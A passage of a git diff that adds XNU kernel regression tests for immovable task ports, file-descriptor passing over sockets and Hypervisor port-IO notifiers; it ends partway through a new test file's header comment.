+               kr = mach_port_extract_right(tport, tport_name, MACH_MSG_TYPE_COPY_SEND, &extracted, &right);
+               T_EXPECT_EQ(kr, KERN_INVALID_CAPABILITY, "mach_port_extract_right() on immovable port in child's space should fail (no crash): 0x%x", kr);
+
+               T_LOG("Still alive..");
+       }
+}
+
+T_DECL(extract_right_soft_fail, "Test mach_port_extract_right() fail on extracting child process's task port without crash",
+    T_META_CHECK_LEAKS(false))
+{
+       uint32_t opts = 0;
+       size_t size = sizeof(&opts);
+       pid_t child_pid;
+       kern_return_t ret;
+       int status, fd[2];
+
+       T_LOG("Check if immovable control port has been enabled\n");
+       ret = sysctlbyname("kern.ipc_control_port_options", &opts, &size, NULL, 0);
+
+       if (!ret && (opts & 0x20) == 0) {
+               T_SKIP("immovable control port hard enforcement isn't enabled");
+       }
+
+       /* extracting mach_task_self() should succeed */
+       test_extract_immovable_task_port(getpid());
+
+       ret = pipe(fd);
+       T_EXPECT_NE(ret, -1, "pipe creation");
+
+
+       child_pid = fork();
+
+       if (child_pid < 0) {
+               T_FAIL("fork failed()");
+       }
+
+       if (child_pid == 0) {
+               close(fd[0]);
+               write(fd[1], "wakeup", 6);
+               close(fd[1]);
+       } else {
+               close(fd[1]);
+               char data[6];
+               read(fd[0], data, 6); /* blocks until data available */
+               close(fd[0]);
+
+               /* extracting child's immovable task port should fail without crash */
+               test_extract_immovable_task_port(child_pid);
+
+               kill(child_pid, SIGKILL);
+               wait(&status);
+       }
+}
diff --git a/tests/fd_send.c b/tests/fd_send.c
new file mode 100644 (file)
index 0000000..53aa368
--- /dev/null
@@ -0,0 +1,207 @@
+#include <darwintest.h>
+#include <darwintest_utils.h>
+#include <dispatch/dispatch.h>
+#include <mach/mach.h>
+#include <signal.h>
+#include <sys/socket.h>
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.fd"),
+       T_META_RUN_CONCURRENTLY(true));
+
+
+#define SOCKETPAIR(pair) \
+       T_ASSERT_POSIX_SUCCESS(socketpair(PF_LOCAL, SOCK_STREAM, 0, pair), "socketpair")
+
+
+static errno_t
+send_fd(int sock, int fd)
+{
+       struct iovec iovec[1];
+       struct msghdr msg;
+       struct cmsghdr *cmsghdrp;
+       char buf[CMSG_SPACE(sizeof(int))];
+
+       iovec[0].iov_base = "";
+       iovec[0].iov_len = 1;
+       msg.msg_name = 0;
+       msg.msg_namelen = 0;
+       msg.msg_iov = iovec;
+       msg.msg_iovlen = 1;
+       msg.msg_control = buf;
+       msg.msg_controllen = CMSG_SPACE(sizeof(int));
+
+       cmsghdrp = CMSG_FIRSTHDR(&msg);
+       cmsghdrp->cmsg_len = CMSG_LEN(sizeof(int));
+       cmsghdrp->cmsg_level = SOL_SOCKET;
+       cmsghdrp->cmsg_type = SCM_RIGHTS;
+
+       memcpy(CMSG_DATA(cmsghdrp), &fd, sizeof(fd));
+
+       if (sendmsg(sock, &msg, 0) < 0) {
+               return errno;
+       }
+
+       return 0;
+}
+
+static errno_t
+recv_fd(int sock, int *fdp)
+{
+       u_char c;
+       struct iovec iovec[1];
+       struct msghdr msg;
+       struct cmsghdr *cmsghdrp;
+       char buf[CMSG_SPACE(sizeof(int))];
+
+       iovec[0].iov_base = &c;
+       iovec[0].iov_len = 1;
+
+       msg.msg_name = 0;
+       msg.msg_namelen = 0;
+       msg.msg_iov = iovec;
+       msg.msg_iovlen = 1;
+       msg.msg_control = buf;
+       msg.msg_controllen = CMSG_SPACE(sizeof(int));
+       msg.msg_flags = 0;
+
+       if (recvmsg(sock, &msg, 0) < 0) {
+               return errno;
+       }
+
+       cmsghdrp = CMSG_FIRSTHDR(&msg);
+       if (cmsghdrp == NULL) {
+               return ENOENT;
+       }
+
+       if (cmsghdrp->cmsg_len != CMSG_LEN(sizeof(int))) {
+               return ENOENT;
+       }
+       if (cmsghdrp->cmsg_level != SOL_SOCKET) {
+               return ENOENT;
+       }
+       if (cmsghdrp->cmsg_type != SCM_RIGHTS) {
+               return ENOENT;
+       }
+
+       memcpy(fdp, CMSG_DATA(cmsghdrp), sizeof(*fdp));
+       return 0;
+}
+
+T_DECL(send, "test for 30465592")
+{
+       int pair[2], fd, status;
+       pid_t child;
+
+       T_ASSERT_POSIX_SUCCESS(socketpair(PF_LOCAL, SOCK_STREAM, 0, pair),
+           "socketpair");
+
+       child = fork();
+       if (child != 0) {
+               fd = open("/dev/null", O_RDWR);
+               T_ASSERT_POSIX_SUCCESS(fd, "open(/dev/null)");
+
+               T_ASSERT_EQ(send_fd(pair[0], fd), 0, "send_fd");
+               T_ASSERT_POSIX_SUCCESS(close(fd), "close(fd)");
+
+               T_EXPECT_POSIX_SUCCESS(waitpid(child, &status, 0), "waitpid");
+       } else {
+               T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &fd), 0, "recv_fd");
+               T_QUIET; T_ASSERT_NE(fd, -1, "received a proper fd");
+               T_QUIET; T_EXPECT_POSIX_SUCCESS(close(fd), "close(fd)");
+               raise(SIGKILL); /* do not confuse the test system */
+       }
+}
+
+T_DECL(send_kill, "test for 30465592")
+{
+       int pair[2], fd, status;
+       pid_t child;
+
+       T_QUIET; SOCKETPAIR(pair);
+
+       child = fork();
+       if (child != 0) {
+               fd = open("/dev/null", O_RDWR);
+               T_ASSERT_POSIX_SUCCESS(fd, "open(/dev/null)");
+
+               T_ASSERT_EQ(send_fd(pair[0], fd), 0, "send_fd");
+               T_ASSERT_POSIX_SUCCESS(close(fd), "close(fd)");
+
+               T_EXPECT_POSIX_SUCCESS(kill(child, SIGKILL), "kill(child)");
+
+               T_EXPECT_POSIX_SUCCESS(waitpid(child, &status, 0), "waitpid");
+       } else {
+               T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &fd), 0, "recv_fd");
+               T_QUIET; T_ASSERT_NE(fd, -1, "received a proper fd");
+               T_QUIET; T_EXPECT_POSIX_SUCCESS(close(fd), "close(fd)");
+               raise(SIGKILL); /* do not confuse the test system */
+       }
+}
+
+T_DECL(send_sock, "test for 30465592")
+{
+       int pair[2], fd, status;
+       pid_t child;
+
+       T_QUIET; SOCKETPAIR(pair);
+
+       child = fork();
+       if (child != 0) {
+               int sock[2];
+
+               T_QUIET; SOCKETPAIR(sock);
+
+               T_ASSERT_EQ(send_fd(pair[0], sock[0]), 0, "send_fd");
+               T_ASSERT_POSIX_SUCCESS(close(sock[0]), "close(sock[0])");
+               T_ASSERT_POSIX_SUCCESS(close(sock[1]), "close(sock[1])");
+
+               T_EXPECT_POSIX_SUCCESS(waitpid(child, &status, 0), "waitpid");
+       } else {
+               T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &fd), 0, "recv_fd");
+               T_QUIET; T_ASSERT_NE(fd, -1, "received a proper fd");
+               T_QUIET; T_EXPECT_POSIX_SUCCESS(close(fd), "close(fd)");
+               raise(SIGKILL); /* do not confuse the test system */
+       }
+}
+
+T_DECL(send_stress, "test for 67133384")
+{
+       int fd;
+
+       fd = open("/dev/null", O_RDWR);
+       T_ASSERT_POSIX_SUCCESS(fd, "open(/dev/null)");
+
+       dispatch_apply(10, NULL, ^(size_t worker) {
+               dispatch_queue_t q = dispatch_queue_create("receiver", NULL);
+               dispatch_group_t g = dispatch_group_create();
+               int pairbuf[2], *pair = pairbuf;
+               int n = 1000;
+
+               SOCKETPAIR(pair);
+
+               dispatch_group_async(g, q, ^{
+                       int tmp;
+
+                       for (int i = 0; i < n; i++) {
+                               T_QUIET; T_ASSERT_EQ(recv_fd(pair[1], &tmp), 0, "recv_fd");
+                               T_QUIET; T_ASSERT_NE(tmp, -1, "received a proper fd");
+                               T_QUIET; T_EXPECT_POSIX_SUCCESS(close(tmp), "close(tmp)");
+                       }
+               });
+               dispatch_release(q);
+
+               for (int i = 0; i < n; i++) {
+                       int tmp = dup(fd);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(tmp, "dup");
+                       T_QUIET; T_ASSERT_EQ(send_fd(pair[0], tmp), 0, "send_fd");
+                       T_QUIET; T_EXPECT_POSIX_SUCCESS(close(tmp), "close(tmp)");
+               }
+               dispatch_group_wait(g, DISPATCH_TIME_FOREVER);
+
+               T_PASS("sent and received %d fds in worker %zd", n, worker);
+
+               T_QUIET; T_EXPECT_POSIX_SUCCESS(close(pair[0]), "close(pair[0])");
+               T_QUIET; T_EXPECT_POSIX_SUCCESS(close(pair[1]), "close(pair[1])");
+       });
+}
index 12f09d0e85881a101ecfce7ebc4cc51e3a126f78..aaf0610b9d23f3efcefd93fa8936c138ffe504b4 100644 (file)
@@ -54,6 +54,8 @@ static volatile bool mach_exc_caught = false;
 #ifdef __arm64__
 static size_t
 exc_arithmetic_handler(
+       __unused mach_port_t task,
+       __unused mach_port_t thread,
        exception_type_t type,
        mach_exception_data_t codes_64)
 {
diff --git a/tests/hv_private.entitlements b/tests/hv_private.entitlements
deleted file mode 100644 (file)
index e6cea65..0000000
+++ /dev/null
@@ -1,8 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-       <key>com.apple.private.hypervisor</key>
-       <true/>
-</dict>
-</plist>
diff --git a/tests/hv_public.entitlements b/tests/hv_public.entitlements
deleted file mode 100644 (file)
index c2ef1a3..0000000
+++ /dev/null
@@ -1,8 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-       <key>com.apple.security.hypervisor</key>
-       <true/>
-</dict>
-</plist>
index 0aebb6bc1b4a07c952d2bc9531e319f973a4c1f2..65e885e43a314c7b7b741a43fd6063c6570b4e55 100644 (file)
@@ -569,8 +569,11 @@ vm_setup()
 static void
 vm_cleanup()
 {
-    T_ASSERT_EQ(hv_vm_destroy(), HV_SUCCESS, "Destroyed vm");
+       T_ASSERT_EQ(hv_vm_destroy(), HV_SUCCESS, "Destroyed vm");
        free_page_cache();
+
+       pml4 = NULL;
+       pml4_gpa = 0;
 }
 
 static pthread_cond_t ready_cond = PTHREAD_COND_INITIALIZER;
@@ -1246,3 +1249,392 @@ T_DECL(radar63641279, "rdar://63641279 (Evaluate \"no SMT\" scheduling option/si
 
        vm_cleanup();
 }
+
+// Get the number of  messages waiting for the specified port
+static int
+get_count(mach_port_t port)
+{
+       int count;
+
+       count = 0;
+       while (true) {
+               hv_ion_message_t msg = {
+                       .header.msgh_size = sizeof (msg),
+                       .header.msgh_local_port = port,
+               };
+
+               kern_return_t ret = mach_msg(&msg.header, MACH_RCV_MSG | MACH_RCV_TIMEOUT,
+                   0, sizeof (msg), port, 0, MACH_PORT_NULL);
+
+               if (ret != MACH_MSG_SUCCESS) {
+                       break;
+               }
+
+               T_QUIET; T_ASSERT_TRUE(msg.addr == 0xab || msg.addr == 0xcd || msg.addr == 0xef,
+                   "address is 0xab, 0xcd or 0xef");
+               T_QUIET; T_ASSERT_EQ(msg.value, 0xaaULL, "value written is 0xaa");
+               T_QUIET; T_ASSERT_TRUE(msg.size == 1 || msg.size == 4, "size is 1 or 4");
+
+               count++;
+       }
+
+       return count;
+}
+
+static void *
+pio_monitor(void *arg, hv_vcpuid_t vcpu)
+{
+
+       size_t guest_pages_size = round_page((uintptr_t)&hvtest_end - (uintptr_t)&hvtest_begin);
+       const size_t mem_size = 1 * 1024 * 1024;
+       uint8_t *guest_pages_shadow = valloc(mem_size);
+       int handle_io_count = 0;
+       uint64_t exit_reason = 0;
+
+       setup_real_mode(vcpu);
+
+       bzero(guest_pages_shadow, mem_size);
+       memcpy(guest_pages_shadow+0x1000, &hvtest_begin, guest_pages_size);
+
+       T_ASSERT_EQ(hv_vm_map(guest_pages_shadow, 0x0, mem_size, HV_MEMORY_READ | HV_MEMORY_EXEC), HV_SUCCESS,
+           "map guest memory");
+
+       while (true) {
+           T_QUIET; T_ASSERT_EQ(hv_vcpu_run_until(vcpu, ~(uint64_t)0), HV_SUCCESS, "run VCPU");
+           exit_reason = get_vmcs(vcpu, VMCS_RO_EXIT_REASON);
+
+               if (exit_reason == VMX_REASON_VMCALL) {
+                       break;
+               }
+
+               if (exit_reason == VMX_REASON_IRQ) {
+                       continue;
+               }
+
+               T_QUIET; T_ASSERT_EQ(exit_reason, (uint64_t)VMX_REASON_IO, "exit reason is IO");
+
+               union {
+                       struct {
+                               uint64_t io_size:3;
+                               uint64_t io_dirn:1;
+                               uint64_t io_string:1;
+                               uint64_t io_rep:1;
+                               uint64_t io_encoding:1;
+                               uint64_t __io_resvd0:9;
+                               uint64_t io_port:16;
+                               uint64_t __io_resvd1:32;
+                       } io;
+                       uint64_t reg64;
+               } info = {
+                       .reg64 = get_vmcs(vcpu, VMCS_RO_EXIT_QUALIFIC),
+               };
+
+               T_QUIET; T_ASSERT_EQ(info.io.io_port, 0xefULL, "exit is a port IO on 0xef");
+
+               handle_io_count++;
+
+               set_vmcs(vcpu, VMCS_GUEST_RIP, get_reg(vcpu, HV_X86_RIP) + get_vmcs(vcpu, VMCS_RO_VMEXIT_INSTR_LEN));
+       }
+
+       free(guest_pages_shadow);
+
+       *((int *)arg) = handle_io_count;
+
+       return NULL;
+}
+
+T_DECL(pio_notifier_arguments, "test adding and removing port IO notifiers")
+{
+       mach_port_t notify_port = MACH_PORT_NULL;
+       kern_return_t kret = KERN_FAILURE;
+       hv_return_t hret = HV_ERROR;
+
+       T_SETUPBEGIN;
+
+       /* Setup notification port. */
+       kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE,
+           &notify_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port");
+
+       kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port,
+          MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right");
+
+       /* Setup VM */
+       vm_setup();
+
+       T_SETUPEND;
+
+       /* Add with bad size. */
+       hret = hv_vm_add_pio_notifier(0xab, 7, 1, notify_port, HV_ION_NONE);
+       T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad size");
+
+       /* Add with bad data. */
+       hret = hv_vm_add_pio_notifier(0xab, 1, UINT16_MAX, notify_port, HV_ION_NONE);
+       T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad data");
+
+       /* Add with bad mach port. */
+       hret = hv_vm_add_pio_notifier(0xab, 1, UINT16_MAX, MACH_PORT_NULL, HV_ION_NONE);
+       T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad port");
+
+       /* Add with bad flags. */
+       hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, 0xffff);
+       T_ASSERT_NE(hret, HV_SUCCESS, "adding notifier with bad flags");
+
+       /* Remove when none are installed. */
+       hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_ASSERT_NE(hret, HV_SUCCESS, "removing a non-existent notifier");
+
+       /* Add duplicate. */
+       hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier");
+       hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_ASSERT_NE(hret, HV_SUCCESS, "adding duplicate notifier");
+       hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier");
+
+       /* Add then remove. */
+       hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier");
+       hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier");
+
+       /* Add two, remove in reverse order. */
+       hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding 1st notifier");
+       hret = hv_vm_add_pio_notifier(0xab, 2, 1, notify_port, HV_ION_NONE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding 2nd notifier");
+       hret = hv_vm_remove_pio_notifier(0xab, 2, 1, notify_port, HV_ION_NONE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing 2nd notifier");
+       hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_NONE);
+       T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier in reverse order");
+
+       /* Add with ANY_SIZE and remove. */
+       hret = hv_vm_add_pio_notifier(0xab, 0, 1, notify_port, HV_ION_ANY_SIZE);
+       T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier with ANY_SIZE");
+       hret = hv_vm_remove_pio_notifier(0xab, 0, 1, notify_port, HV_ION_ANY_SIZE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier with ANY_SIZE");
+
+       /* Add with ANY_VALUE and remove. */
+       hret = hv_vm_add_pio_notifier(0xab, 1, 1, notify_port, HV_ION_ANY_VALUE);
+       T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier with ANY_VALUE");
+       hret = hv_vm_remove_pio_notifier(0xab, 1, 1, notify_port, HV_ION_ANY_VALUE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier with ANY_VALUE");
+
+       vm_cleanup();
+
+       mach_port_mod_refs(mach_task_self(), notify_port, MACH_PORT_RIGHT_RECEIVE, -1);
+}
+
+T_DECL(pio_notifier_bad_port, "test port IO notifiers when the port is destroyed/deallocated/has no receive right")
+{
+       pthread_t vcpu_thread;
+       mach_port_t notify_port = MACH_PORT_NULL;
+       int handle_io_count = 0;
+       kern_return_t kret = KERN_FAILURE;
+       hv_return_t hret = HV_ERROR;
+
+       /* Setup VM */
+       vm_setup();
+
+       /*
+        * Test that nothing bad happens when the notification port is
+        * added and mach_port_destroy() is called.
+        */
+
+       /* Add a notification port. */
+       kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE,
+           &notify_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port");
+
+       /* Insert send right. */
+       kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port,
+          MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right");
+
+       /* All port writes to 0xef. */
+       hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port,
+           HV_ION_ANY_VALUE | HV_ION_ANY_SIZE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes "
+           "to port 0xef");
+
+       /* After adding, destroy the port. */
+       kret = mach_port_destroy(mach_task_self(), notify_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "destroying notify port");
+
+       vcpu_thread = create_vcpu_thread((vcpu_entry_function)
+           (((uintptr_t)pio_entry_basic & PAGE_MASK) + 0x1000), 0, pio_monitor,
+           &handle_io_count);
+       T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu");
+
+       /* Expect the messages to be lost. */
+       T_ASSERT_EQ(0, handle_io_count, "0 expected IO exits when port destroyed");
+
+       hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port, HV_ION_ANY_SIZE | HV_ION_ANY_VALUE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xef");
+
+       vm_cleanup();
+
+
+       vm_setup();
+       /*
+        * Test that nothing bad happens when the notification port is added and
+        * mach_port_mod_refs() is called.
+        */
+
+       /* Add a notification port. */
+       kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE,
+           &notify_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port");
+
+       /* Insert send right. */
+       kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port,
+          MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right");
+
+       /* All port writes to 0xef. */
+       hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port,
+           HV_ION_ANY_VALUE | HV_ION_ANY_SIZE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes "
+           "to port 0xef");
+
+       /* After adding, remove receive right. */
+       mach_port_mod_refs(mach_task_self(), notify_port, MACH_PORT_RIGHT_RECEIVE, -1);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "removing receive right");
+
+       vcpu_thread = create_vcpu_thread((vcpu_entry_function)
+           (((uintptr_t)pio_entry_basic & PAGE_MASK) + 0x1000), 0, pio_monitor,
+           &handle_io_count);
+       T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu");
+
+       /* Expect messages to be lost. */
+       T_ASSERT_EQ(0, handle_io_count, "0 expected IO exits when receive right removed");
+
+       hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port, HV_ION_ANY_SIZE | HV_ION_ANY_VALUE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xef");
+
+       vm_cleanup();
+
+
+       vm_setup();
+       /*
+        * Test that nothing bad happens when the notification port is added and
+        * mach_port_deallocate() is called.
+        */
+
+       /* Add a notification port. */
+       kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE,
+           &notify_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port");
+
+       /* Insert send right. */
+       kret = mach_port_insert_right(mach_task_self(), notify_port, notify_port,
+          MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right");
+
+       /* All port writes to 0xef. */
+       hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port,
+           HV_ION_ANY_VALUE | HV_ION_ANY_SIZE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes "
+           "to port 0xef");
+
+       /* After adding, call mach_port_deallocate(). */
+       kret = mach_port_deallocate(mach_task_self(), notify_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "destroying notify port");
+
+       vcpu_thread = create_vcpu_thread((vcpu_entry_function)
+           (((uintptr_t)pio_entry_basic & PAGE_MASK) + 0x1000), 0, pio_monitor,
+           &handle_io_count);
+       T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu");
+
+       /* Expect messages to be lost. */
+       T_ASSERT_EQ(0, handle_io_count, "0 expected IO exits when port deallocated");
+
+       hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port, HV_ION_ANY_SIZE | HV_ION_ANY_VALUE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xef");
+
+       vm_cleanup();
+}
+
+T_DECL(pio_notifier, "test port IO notifiers")
+{
+       #define MACH_PORT_COUNT 4
+       mach_port_t notify_port[MACH_PORT_COUNT] = { MACH_PORT_NULL };
+       int handle_io_count = 0;
+       kern_return_t kret = KERN_FAILURE;
+       hv_return_t hret = HV_ERROR;
+
+       T_SETUPBEGIN;
+
+       /* Setup notification ports. */
+       for (int i = 0; i  < MACH_PORT_COUNT; i++) {
+               kret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE,
+                   &notify_port[i]);
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "allocate mach port");
+
+               kret = mach_port_insert_right(mach_task_self(), notify_port[i], notify_port[i],
+                  MACH_MSG_TYPE_MAKE_SEND);
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kret, "insert send right");
+       }
+       /* Setup VM */
+       vm_setup();
+
+       T_SETUPEND;
+
+       /* Test that messages are properly sent to mach port notifiers. */
+
+       /* One for all port writes to 0xab. */
+       hret = hv_vm_add_pio_notifier(0xab, 0, 0, notify_port[0],
+           HV_ION_ANY_VALUE | HV_ION_ANY_SIZE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes "
+           "to port 0xab");
+
+       /* One for for 4 byte writes of 0xaa. */
+       hret = hv_vm_add_pio_notifier(0xab, 4, 0xaa, notify_port[1], HV_ION_NONE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for 4 byte writes "
+           "to port 0xab");
+
+       /* One for all writes to 0xcd (ignoring queue full errors). */
+       hret = hv_vm_add_pio_notifier(0xcd, 0, 0, notify_port[2],
+           HV_ION_ANY_SIZE | HV_ION_ANY_VALUE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes "
+           "to port 0xcd, ignoring if the queue fills");
+
+       /* One for writes to 0xef asking for exits when the queue is full. */
+       hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port[3],
+           HV_ION_ANY_SIZE | HV_ION_ANY_VALUE | HV_ION_EXIT_FULL);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes "
+           "to port 0xef, not ignoring if the queue fills");
+
+       pthread_t vcpu_thread = create_vcpu_thread((vcpu_entry_function)
+           (((uintptr_t)pio_entry & PAGE_MASK) + 0x1000), 0, pio_monitor,
+           &handle_io_count);
+       T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu");
+
+       /* Expect messages to be waiting. */
+       T_ASSERT_EQ(4, get_count(notify_port[0]), "expected 4 messages");
+       T_ASSERT_EQ(1, get_count(notify_port[1]), "expected 1 messages");
+       T_ASSERT_EQ(10, get_count(notify_port[2]) + handle_io_count, "expected IO exits");
+       T_ASSERT_EQ(5, get_count(notify_port[3]), "expected 5 messages");
+
+       hret = hv_vm_remove_pio_notifier(0xab, 0, 0, notify_port[0], HV_ION_ANY_SIZE | HV_ION_ANY_VALUE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xab");
+
+       hret = hv_vm_remove_pio_notifier(0xab, 4, 0xaa, notify_port[1], HV_ION_NONE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for 4 byte writes "
+           "to port 0xab");
+
+       hret = hv_vm_remove_pio_notifier(0xcd, 0, 0, notify_port[2], HV_ION_ANY_SIZE | HV_ION_ANY_VALUE);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes "
+           "to port 0xcd, ignoring if the queue fills");
+
+       hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port[3], HV_ION_ANY_SIZE | HV_ION_ANY_VALUE | HV_ION_EXIT_FULL);
+       T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes "
+           "to port 0xef, not ignoring if the queue fills");
+
+       vm_cleanup();
+
+       for (int i = 0; i < MACH_PORT_COUNT; i++) {
+               mach_port_mod_refs(mach_task_self(), notify_port[i], MACH_PORT_RIGHT_RECEIVE, -1);
+       }
+}
index c2783f5c579bb5dc2275955361c0b24d9bc5656a..461b1dbc45a79693d7c403fd21e36fc5965f5d27 100644 (file)
@@ -482,5 +482,42 @@ _radar60691363_entry:
 
        vmcall
 
+.code16
+
+       // Perform a fixed number of port I/Os with various arguments.
+       .global _pio_entry
+_pio_entry:
+
+       movl    $0xaa, %eax
+
+       outl    %eax, $0xab
+
+       movl    $3, %ecx
+1:     outb    %al, $0xab
+       loop    1b
+
+       movl    $10, %ecx
+1:     outb    %al, $0xcd
+       loop    1b
+
+       movl    $10, %ecx
+1:     outb    %al, $0xef
+       loop    1b
+
+       movl    $0x23456, %eax
+       vmcall
+
+.code16
+       // Perform 10 port I/Os on 0xef.
+       .global _pio_entry_basic
+_pio_entry_basic:
+
+       movl    $10, %ecx
+1:     outb    %al, $0xef
+       loop    1b
+
+       movl    $0x23456, %eax
+       vmcall
+
        .global _hvtest_end
 _hvtest_end:
index 5cb41f34cf87a349d1975c4240e6b396836b8f1d..df15339cee490f91c108202e2b1fbcf029b0cb15 100644 (file)
@@ -13,6 +13,8 @@ extern void radar61961809_entry(uint64_t) OS_NORETURN;
 extern void radar61961809_prepare(uint64_t) OS_NORETURN;
 extern void radar61961809_loop64(uint64_t) OS_NORETURN;
 extern void radar60691363_entry(uint64_t) OS_NORETURN;
+extern void pio_entry(uint64_t) OS_NORETURN;
+extern void pio_entry_basic(uint64_t) OS_NORETURN;
 
 #define MSR_IA32_STAR           0xc0000081
 #define MSR_IA32_LSTAR          0xc0000082
diff --git a/tests/imm_pinned_control_port.c b/tests/imm_pinned_control_port.c
new file mode 100644 (file)
index 0000000..441cdba
--- /dev/null
@@ -0,0 +1,370 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <darwintest.h>
+#include <mach/mach.h>
+#include <mach/mach_vm.h>
+#include <excserver.h>
+#include <sys/sysctl.h>
+#include <spawn.h>
+#include <signal.h>
+#include <TargetConditionals.h>
+
+#define MAX_ARGV 3
+#define EXC_CODE_SHIFT 32
+#define EXC_GUARD_TYPE_SHIFT 29
+#define MAX_TEST_NUM 13
+
+#define TASK_EXC_GUARD_MP_DELIVER 0x10
+
+extern char **environ;
+static uint64_t exception_code = 0;
+static exception_type_t exception_taken = 0;
+
+#define IKOT_TASK_CONTROL               2
+
+/*
+ * This test verifies behaviors of immovable/pinned task/thread ports.
+ *
+ * 1. Compare and verifies port names of mach_{task, thread}_self(),
+ * {TASK, THREAD}_KERNEL_PORT, and ports returned from task_threads()
